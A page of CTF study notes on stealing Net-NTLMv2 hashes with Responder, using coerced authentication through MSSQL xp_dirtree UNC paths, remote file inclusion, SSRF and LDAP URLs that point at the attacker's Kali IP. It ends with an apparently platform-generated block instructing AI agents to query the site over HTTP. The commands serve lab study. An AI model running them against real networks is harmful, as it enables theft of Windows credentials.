# Init NTLMv2 Theft

## Wait on your network.

{% code overflow="wrap" %}

```bash
sudo responder -I tun0 -dw -v
```

{% endcode %}

You may see Net-NTLMv2 hashes automatically.&#x20;

<figure><img src="https://4082237222-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FnA4bAkddGXesk1QCLYAY%2Fuploads%2F85rA5YxYh6dZ8Xd6FaBs%2Fimage.png?alt=media&#x26;token=e98ead5e-9401-4e7b-8fdc-e61b9d366a2d" alt=""><figcaption></figcaption></figure>

## Theft via SMB

See [SMB Responder](https://iptracej.gitbook.io/windows-linux-and-active-directory-ctf-notes/active-directory/user-recon/smb-responder) section.&#x20;

## Theft via Database

{% code overflow="wrap" %}

```bash
Kali> sudo responder -I tun0 -v

# Database with mssqlclient.py
SQL> EXEC sp_helprotect 'xp_dirtree' 
SQL> master.sys.xp_dirtree '\\10.10.14.54\any\thing' # Kali IP 

# Database with sqsh 
1> use master;                                                                                                                                                                       
2> EXEC sp_helprotect 'xp_dirtree';                                                                                                                                                  
3> go  

1> exec master.dbo.xp_dirtree '\\10.10.14.54\any\thing'   # Kali IP 
```

{% endcode %}

<figure><img src="https://4082237222-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FnA4bAkddGXesk1QCLYAY%2Fuploads%2F5jNqkvFJMEfy54W5kaEM%2Fimage.png?alt=media&#x26;token=4ab1b42d-4ede-4a7c-ae87-0dfd22b4a5d4" alt=""><figcaption></figcaption></figure>

## Theft via HTTB &#x20;

{% code overflow="wrap" %}

```bash
# Find a RFI vulnerability and then access to back to Kali
Kali> sudo responder -I tun0
Browser> http://school.flight.htb/index.php?view=//<Kali IP>/any/thing.txt

# Another example 
Kali> sudo responder -I tun0 -v
Kali> curl "http://192.168.206.165:8080/?url=http://192.168.49.206" 
```

{% endcode %}

## Theft via LDAP &#x20;

```bash
Kali> sudo responder -I tun0

# Target Windows OS 
# Access to Ldap, triggering back to Kali
# ldap://<Kali IP>:389
Target system or service> ldap://10.10.14.114:389
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://iptracej.gitbook.io/windows-linux-and-active-directory-ctf-notes/active-directory/init-ntlmv2-theft.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
